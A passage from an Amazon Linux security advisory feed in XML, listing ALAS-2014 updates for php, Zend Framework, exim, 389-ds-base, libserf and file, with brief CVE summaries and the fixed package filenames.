arch="x86_64"><filename>Packages/kernel-devel-3.10.53-56.140.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="3.10.53" release="56.140.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-3.10.53-56.140.amzn1.x86_64.rpm</filename></package><package name="perf" version="3.10.53" release="56.140.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-3.10.53-56.140.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="3.10.53" release="56.140.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-3.10.53-56.140.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="3.10.53" release="56.140.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-3.10.53-56.140.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="3.10.53" release="56.140.amzn1" 
epoch="0" arch="i686"><filename>Packages/kernel-headers-3.10.53-56.140.amzn1.i686.rpm</filename></package><package name="perf" version="3.10.53" release="56.140.amzn1" epoch="0" arch="i686"><filename>Packages/perf-3.10.53-56.140.amzn1.i686.rpm</filename></package><package name="kernel" version="3.10.53" release="56.140.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-3.10.53-56.140.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="3.10.53" release="56.140.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-3.10.53-56.140.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="3.10.53" release="56.140.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-3.10.53-56.140.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="3.10.53" release="56.140.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-3.10.53-56.140.amzn1.i686.rpm</filename></package><package name="kernel-doc" version="3.10.53" release="56.140.amzn1" epoch="0" arch="noarch"><filename>Packages/kernel-doc-3.10.53-56.140.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-393</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-393: medium priority package update for php</title><issued date="2014-08-21 11:15:00" /><updated date="2014-09-19 12:00:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-4049:
Heap-based buffer overflow in the php_parserr function in ext/standard/dns.c in PHP 5.6.0beta4 and earlier allows remote servers to cause a denial of service (crash) and possibly execute arbitrary code via a crafted DNS TXT record, related to the dns_get_record function.
A heap-based buffer overflow flaw was found in the way PHP parsed DNS TXT records. A malicious DNS server or a man-in-the-middle attacker could possibly use this flaw to execute arbitrary code as the PHP interpreter if a PHP application used the dns_get_record() function to perform a DNS query.
1108447:
CVE-2014-4049 php: heap-based buffer overflow in DNS TXT record parsing
CVE-2014-3981:
acinclude.m4, as used in the configure script in PHP 5.5.13 and earlier, allows local users to overwrite arbitrary files via a symlink attack on the /tmp/phpglibccheck file.
1104978:
CVE-2014-3981 php: insecure temporary file use in the configure script
CVE-2014-3515:
A type confusion issue was found in the SPL ArrayObject and SPLObjectStorage classes' unserialize() method. A remote attacker able to submit specially crafted input to a PHP application, which would then unserialize this input using one of the aforementioned methods, could use this flaw to execute arbitrary code with the privileges of the user running that PHP application.
1112154:
CVE-2014-3515 php: unserialize() SPL ArrayObject / SPLObjectStorage type confusion flaw
CVE-2014-0238:
The cdf_read_property_info function in cdf.c in the Fileinfo component in PHP before 5.4.29 and 5.5.x before 5.5.13 allows remote attackers to cause a denial of service (infinite loop or out-of-bounds memory access) via a vector that (1) has zero length or (2) is too long.
A denial of service flaw was found in the way the File Information (fileinfo) extension parsed certain Composite Document Format (CDF) files. A remote attacker could use this flaw to crash a PHP application using fileinfo via a specially crafted CDF file.
1098155:
CVE-2014-0238 file: CDF property info parsing nelements infinite loop
CVE-2014-0237:
The cdf_unpack_summary_info function in cdf.c in the Fileinfo component in PHP before 5.4.29 and 5.5.x before 5.5.13 allows remote attackers to cause a denial of service (performance degradation) by triggering many file_printf calls.
A denial of service flaw was found in the way the File Information (fileinfo) extension parsed certain Composite Document Format (CDF) files. A remote attacker could use this flaw to crash a PHP application using fileinfo via a specially crafted CDF file.
1098193:
CVE-2014-0237 file: cdf_unpack_summary_info() excessive looping DoS
CVE-2014-0207:
The cdf_read_short_sector function in cdf.c in file before 5.19, as used in the Fileinfo component in PHP before 5.4.30 and 5.5.x before 5.5.14, allows remote attackers to cause a denial of service (assertion failure and application exit) via a crafted CDF file.
A denial of service flaw was found in the way the File Information (fileinfo) extension parsed certain Composite Document Format (CDF) files. A remote attacker could use this flaw to crash a PHP application using fileinfo via a specially crafted CDF file.
1091842:
CVE-2014-0207 file: cdf_read_short_sector insufficient boundary check
CVE-2013-6712:
A buffer over-read flaw was found in the way the DateInterval class parsed interval specifications. An attacker able to make a PHP application parse a specially crafted specification using DateInterval could possibly cause the PHP interpreter to crash.
1035670:
CVE-2013-6712 php: heap-based buffer over-read in DateInterval
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6712" title="" id="CVE-2013-6712" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0207" title="" id="CVE-2014-0207" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0237" title="" id="CVE-2014-0237" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0238" title="" id="CVE-2014-0238" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3515" title="" id="CVE-2014-3515" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3981" title="" id="CVE-2014-3981" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4049" title="" id="CVE-2014-4049" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php-debuginfo" version="5.3.29" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-debuginfo-5.3.29-1.7.amzn1.x86_64.rpm</filename></package><package name="php-tidy" version="5.3.29" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-tidy-5.3.29-1.7.amzn1.x86_64.rpm</filename></package><package name="php-enchant" version="5.3.29" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-enchant-5.3.29-1.7.amzn1.x86_64.rpm</filename></package><package name="php" version="5.3.29" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-5.3.29-1.7.amzn1.x86_64.rpm</filename></package><package name="php-pdo" version="5.3.29" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-pdo-5.3.29-1.7.amzn1.x86_64.rpm</filename></package><package name="php-mcrypt" version="5.3.29" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-mcrypt-5.3.29-1.7.amzn1.x86_64.rpm</filename></package><package name="php-mssql" version="5.3.29" release="1.7.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/php-mssql-5.3.29-1.7.amzn1.x86_64.rpm</filename></package><package name="php-cli" version="5.3.29" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-cli-5.3.29-1.7.amzn1.x86_64.rpm</filename></package><package name="php-recode" version="5.3.29" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-recode-5.3.29-1.7.amzn1.x86_64.rpm</filename></package><package name="php-ldap" version="5.3.29" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-ldap-5.3.29-1.7.amzn1.x86_64.rpm</filename></package><package name="php-dba" version="5.3.29" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-dba-5.3.29-1.7.amzn1.x86_64.rpm</filename></package><package name="php-xml" version="5.3.29" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-xml-5.3.29-1.7.amzn1.x86_64.rpm</filename></package><package name="php-intl" version="5.3.29" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-intl-5.3.29-1.7.amzn1.x86_64.rpm</filename></package><package name="php-snmp" version="5.3.29" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-snmp-5.3.29-1.7.amzn1.x86_64.rpm</filename></package><package name="php-embedded" version="5.3.29" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-embedded-5.3.29-1.7.amzn1.x86_64.rpm</filename></package><package name="php-xmlrpc" version="5.3.29" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-xmlrpc-5.3.29-1.7.amzn1.x86_64.rpm</filename></package><package name="php-imap" version="5.3.29" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-imap-5.3.29-1.7.amzn1.x86_64.rpm</filename></package><package name="php-devel" version="5.3.29" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-devel-5.3.29-1.7.amzn1.x86_64.rpm</filename></package><package name="php-bcmath" version="5.3.29" release="1.7.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/php-bcmath-5.3.29-1.7.amzn1.x86_64.rpm</filename></package><package name="php-odbc" version="5.3.29" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-odbc-5.3.29-1.7.amzn1.x86_64.rpm</filename></package><package name="php-soap" version="5.3.29" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-soap-5.3.29-1.7.amzn1.x86_64.rpm</filename></package><package name="php-mysql" version="5.3.29" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-mysql-5.3.29-1.7.amzn1.x86_64.rpm</filename></package><package name="php-mysqlnd" version="5.3.29" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-mysqlnd-5.3.29-1.7.amzn1.x86_64.rpm</filename></package><package name="php-mbstring" version="5.3.29" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-mbstring-5.3.29-1.7.amzn1.x86_64.rpm</filename></package><package name="php-pgsql" version="5.3.29" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-pgsql-5.3.29-1.7.amzn1.x86_64.rpm</filename></package><package name="php-gd" version="5.3.29" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-gd-5.3.29-1.7.amzn1.x86_64.rpm</filename></package><package name="php-process" version="5.3.29" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-process-5.3.29-1.7.amzn1.x86_64.rpm</filename></package><package name="php-fpm" version="5.3.29" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-fpm-5.3.29-1.7.amzn1.x86_64.rpm</filename></package><package name="php-common" version="5.3.29" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-common-5.3.29-1.7.amzn1.x86_64.rpm</filename></package><package name="php-pspell" version="5.3.29" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-pspell-5.3.29-1.7.amzn1.x86_64.rpm</filename></package><package name="php-enchant" version="5.3.29" release="1.7.amzn1" epoch="0" 
arch="i686"><filename>Packages/php-enchant-5.3.29-1.7.amzn1.i686.rpm</filename></package><package name="php" version="5.3.29" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/php-5.3.29-1.7.amzn1.i686.rpm</filename></package><package name="php-devel" version="5.3.29" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/php-devel-5.3.29-1.7.amzn1.i686.rpm</filename></package><package name="php-xmlrpc" version="5.3.29" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/php-xmlrpc-5.3.29-1.7.amzn1.i686.rpm</filename></package><package name="php-bcmath" version="5.3.29" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/php-bcmath-5.3.29-1.7.amzn1.i686.rpm</filename></package><package name="php-fpm" version="5.3.29" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/php-fpm-5.3.29-1.7.amzn1.i686.rpm</filename></package><package name="php-tidy" version="5.3.29" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/php-tidy-5.3.29-1.7.amzn1.i686.rpm</filename></package><package name="php-embedded" version="5.3.29" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/php-embedded-5.3.29-1.7.amzn1.i686.rpm</filename></package><package name="php-mysql" version="5.3.29" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/php-mysql-5.3.29-1.7.amzn1.i686.rpm</filename></package><package name="php-xml" version="5.3.29" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/php-xml-5.3.29-1.7.amzn1.i686.rpm</filename></package><package name="php-mcrypt" version="5.3.29" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/php-mcrypt-5.3.29-1.7.amzn1.i686.rpm</filename></package><package name="php-snmp" version="5.3.29" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/php-snmp-5.3.29-1.7.amzn1.i686.rpm</filename></package><package name="php-pspell" version="5.3.29" release="1.7.amzn1" epoch="0" 
arch="i686"><filename>Packages/php-pspell-5.3.29-1.7.amzn1.i686.rpm</filename></package><package name="php-mssql" version="5.3.29" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/php-mssql-5.3.29-1.7.amzn1.i686.rpm</filename></package><package name="php-ldap" version="5.3.29" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/php-ldap-5.3.29-1.7.amzn1.i686.rpm</filename></package><package name="php-intl" version="5.3.29" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/php-intl-5.3.29-1.7.amzn1.i686.rpm</filename></package><package name="php-odbc" version="5.3.29" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/php-odbc-5.3.29-1.7.amzn1.i686.rpm</filename></package><package name="php-debuginfo" version="5.3.29" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/php-debuginfo-5.3.29-1.7.amzn1.i686.rpm</filename></package><package name="php-pdo" version="5.3.29" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/php-pdo-5.3.29-1.7.amzn1.i686.rpm</filename></package><package name="php-mbstring" version="5.3.29" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/php-mbstring-5.3.29-1.7.amzn1.i686.rpm</filename></package><package name="php-gd" version="5.3.29" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/php-gd-5.3.29-1.7.amzn1.i686.rpm</filename></package><package name="php-recode" version="5.3.29" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/php-recode-5.3.29-1.7.amzn1.i686.rpm</filename></package><package name="php-pgsql" version="5.3.29" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/php-pgsql-5.3.29-1.7.amzn1.i686.rpm</filename></package><package name="php-imap" version="5.3.29" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/php-imap-5.3.29-1.7.amzn1.i686.rpm</filename></package><package name="php-cli" version="5.3.29" release="1.7.amzn1" epoch="0" 
arch="i686"><filename>Packages/php-cli-5.3.29-1.7.amzn1.i686.rpm</filename></package><package name="php-soap" version="5.3.29" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/php-soap-5.3.29-1.7.amzn1.i686.rpm</filename></package><package name="php-process" version="5.3.29" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/php-process-5.3.29-1.7.amzn1.i686.rpm</filename></package><package name="php-dba" version="5.3.29" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/php-dba-5.3.29-1.7.amzn1.i686.rpm</filename></package><package name="php-common" version="5.3.29" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/php-common-5.3.29-1.7.amzn1.i686.rpm</filename></package><package name="php-mysqlnd" version="5.3.29" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/php-mysqlnd-5.3.29-1.7.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-394</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-394: medium priority package update for php-ZendFramework</title><issued date="2014-08-21 11:18:00" /><updated date="2014-09-19 11:48:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-4914:
1117545:
CVE-2014-4914 Zend FrameWork: ZF2014-04: Potential SQL injection in the ORDER implementation of Zend_Db_Select
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4914" title="" id="CVE-2014-4914" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php-ZendFramework-Serializer-Adapter-Igbinary" version="1.12.7" release="1.9.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Serializer-Adapter-Igbinary-1.12.7-1.9.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-full" version="1.12.7" release="1.9.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-full-1.12.7-1.9.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Db-Adapter-Pdo-Mysql" version="1.12.7" release="1.9.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Db-Adapter-Pdo-Mysql-1.12.7-1.9.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Dojo" version="1.12.7" release="1.9.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Dojo-1.12.7-1.9.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Db-Adapter-Pdo" version="1.12.7" release="1.9.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Db-Adapter-Pdo-1.12.7-1.9.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Pdf" version="1.12.7" release="1.9.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Pdf-1.12.7-1.9.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Services" version="1.12.7" release="1.9.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Services-1.12.7-1.9.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Search-Lucene" version="1.12.7" release="1.9.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Search-Lucene-1.12.7-1.9.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Cache-Backend-Libmemcached" version="1.12.7" release="1.9.amzn1" epoch="0" 
arch="noarch"><filename>Packages/php-ZendFramework-Cache-Backend-Libmemcached-1.12.7-1.9.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework" version="1.12.7" release="1.9.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-1.12.7-1.9.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Cache-Backend-Apc" version="1.12.7" release="1.9.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Cache-Backend-Apc-1.12.7-1.9.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-demos" version="1.12.7" release="1.9.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-demos-1.12.7-1.9.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Soap" version="1.12.7" release="1.9.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Soap-1.12.7-1.9.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Db-Adapter-Mysqli" version="1.12.7" release="1.9.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Db-Adapter-Mysqli-1.12.7-1.9.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Ldap" version="1.12.7" release="1.9.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Ldap-1.12.7-1.9.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-extras" version="1.12.7" release="1.9.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-extras-1.12.7-1.9.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Db-Adapter-Pdo-Pgsql" version="1.12.7" release="1.9.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Db-Adapter-Pdo-Pgsql-1.12.7-1.9.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Captcha" version="1.12.7" release="1.9.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Captcha-1.12.7-1.9.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Db-Adapter-Pdo-Mssql" version="1.12.7" 
release="1.9.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Db-Adapter-Pdo-Mssql-1.12.7-1.9.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Feed" version="1.12.7" release="1.9.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Feed-1.12.7-1.9.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Auth-Adapter-Ldap" version="1.12.7" release="1.9.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Auth-Adapter-Ldap-1.12.7-1.9.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Cache-Backend-Memcached" version="1.12.7" release="1.9.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Cache-Backend-Memcached-1.12.7-1.9.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-395</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-395: low priority package update for exim</title><issued date="2014-08-21 11:19:00" /><updated date="2014-09-19 11:48:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-2972:
1122552:
CVE-2014-2972 exim: local code execution via string expansion
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2972" title="" id="CVE-2014-2972" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="exim-pgsql" version="4.72" release="6.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-pgsql-4.72-6.6.amzn1.x86_64.rpm</filename></package><package name="exim-mon" version="4.72" release="6.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-mon-4.72-6.6.amzn1.x86_64.rpm</filename></package><package name="exim-greylist" version="4.72" release="6.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-greylist-4.72-6.6.amzn1.x86_64.rpm</filename></package><package name="exim" version="4.72" release="6.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-4.72-6.6.amzn1.x86_64.rpm</filename></package><package name="exim-debuginfo" version="4.72" release="6.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-debuginfo-4.72-6.6.amzn1.x86_64.rpm</filename></package><package name="exim-mysql" version="4.72" release="6.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-mysql-4.72-6.6.amzn1.x86_64.rpm</filename></package><package name="exim-mon" version="4.72" release="6.6.amzn1" epoch="0" arch="i686"><filename>Packages/exim-mon-4.72-6.6.amzn1.i686.rpm</filename></package><package name="exim-debuginfo" version="4.72" release="6.6.amzn1" epoch="0" arch="i686"><filename>Packages/exim-debuginfo-4.72-6.6.amzn1.i686.rpm</filename></package><package name="exim-mysql" version="4.72" release="6.6.amzn1" epoch="0" arch="i686"><filename>Packages/exim-mysql-4.72-6.6.amzn1.i686.rpm</filename></package><package name="exim-greylist" version="4.72" release="6.6.amzn1" epoch="0" arch="i686"><filename>Packages/exim-greylist-4.72-6.6.amzn1.i686.rpm</filename></package><package name="exim-pgsql" version="4.72" release="6.6.amzn1" epoch="0" 
arch="i686"><filename>Packages/exim-pgsql-4.72-6.6.amzn1.i686.rpm</filename></package><package name="exim" version="4.72" release="6.6.amzn1" epoch="0" arch="i686"><filename>Packages/exim-4.72-6.6.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-396</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-396: important priority package update for 389-ds-base</title><issued date="2014-08-21 11:20:00" /><updated date="2014-09-19 11:49:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-3562:
It was found that when replication was enabled for each attribute in Red Hat Directory Server / 389 Directory Server, which is the default configuration, the server returned replicated metadata when the directory was searched while debugging was enabled. A remote attacker could use this flaw to disclose potentially sensitive information.
1123477:
CVE-2014-3562 389-ds: unauthenticated information disclosure
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3562" title="" id="CVE-2014-3562" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="389-ds-base-libs" version="1.3.2.22" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-libs-1.3.2.22-1.18.amzn1.x86_64.rpm</filename></package><package name="389-ds-base-devel" version="1.3.2.22" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-devel-1.3.2.22-1.18.amzn1.x86_64.rpm</filename></package><package name="389-ds-base-debuginfo" version="1.3.2.22" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-debuginfo-1.3.2.22-1.18.amzn1.x86_64.rpm</filename></package><package name="389-ds-base" version="1.3.2.22" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-1.3.2.22-1.18.amzn1.x86_64.rpm</filename></package><package name="389-ds-base-libs" version="1.3.2.22" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-libs-1.3.2.22-1.18.amzn1.i686.rpm</filename></package><package name="389-ds-base" version="1.3.2.22" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-1.3.2.22-1.18.amzn1.i686.rpm</filename></package><package name="389-ds-base-devel" version="1.3.2.22" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-devel-1.3.2.22-1.18.amzn1.i686.rpm</filename></package><package name="389-ds-base-debuginfo" version="1.3.2.22" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-debuginfo-1.3.2.22-1.18.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-397</id><title>Amazon Linux AMI 2014.03 - ALAS-2014-397: medium priority package update for libserf</title><issued date="2014-09-03 14:37:00" /><updated date="2014-09-19 11:49:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-3504:
The (1) serf_ssl_cert_issuer, (2) serf_ssl_cert_subject, and (3) serf_ssl_cert_certificate functions in Serf 0.2.0 through 1.3.x before 1.3.7 do not properly handle a NUL byte in a domain name in the subject's Common Name (CN) field of an X.509 certificate, which allows man-in-the-middle attackers to spoof arbitrary SSL servers via a crafted certificate issued by a legitimate Certification Authority.
1128962:
CVE-2014-3504 libserf: failure to properly handle a NUL character in the CommonName or SubjectAltNames fields
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3504" title="" id="CVE-2014-3504" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libserf" version="1.3.7" release="1.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/libserf-1.3.7-1.6.amzn1.x86_64.rpm</filename></package><package name="libserf-devel" version="1.3.7" release="1.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/libserf-devel-1.3.7-1.6.amzn1.x86_64.rpm</filename></package><package name="libserf-debuginfo" version="1.3.7" release="1.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/libserf-debuginfo-1.3.7-1.6.amzn1.x86_64.rpm</filename></package><package name="libserf-debuginfo" version="1.3.7" release="1.6.amzn1" epoch="0" arch="i686"><filename>Packages/libserf-debuginfo-1.3.7-1.6.amzn1.i686.rpm</filename></package><package name="libserf-devel" version="1.3.7" release="1.6.amzn1" epoch="0" arch="i686"><filename>Packages/libserf-devel-1.3.7-1.6.amzn1.i686.rpm</filename></package><package name="libserf" version="1.3.7" release="1.6.amzn1" epoch="0" arch="i686"><filename>Packages/libserf-1.3.7-1.6.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-398</id><title>Amazon Linux AMI 2014.03 - ALAS-2014-398: medium priority package update for file</title><issued date="2014-09-03 14:38:00" /><updated date="2014-09-19 11:49:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-3587:
Integer overflow in the cdf_read_property_info function in cdf.c in file through 5.19, as used in the Fileinfo component in PHP before 5.4.32 and 5.5.x before 5.5.16, allows remote attackers to cause a denial of service (application crash) via a crafted CDF file. NOTE: this vulnerability exists because of an incomplete fix for CVE-2012-1571.
1128587:
CVE-2014-3587 file: incomplete fix for CVE-2012-1571 in cdf_read_property_info
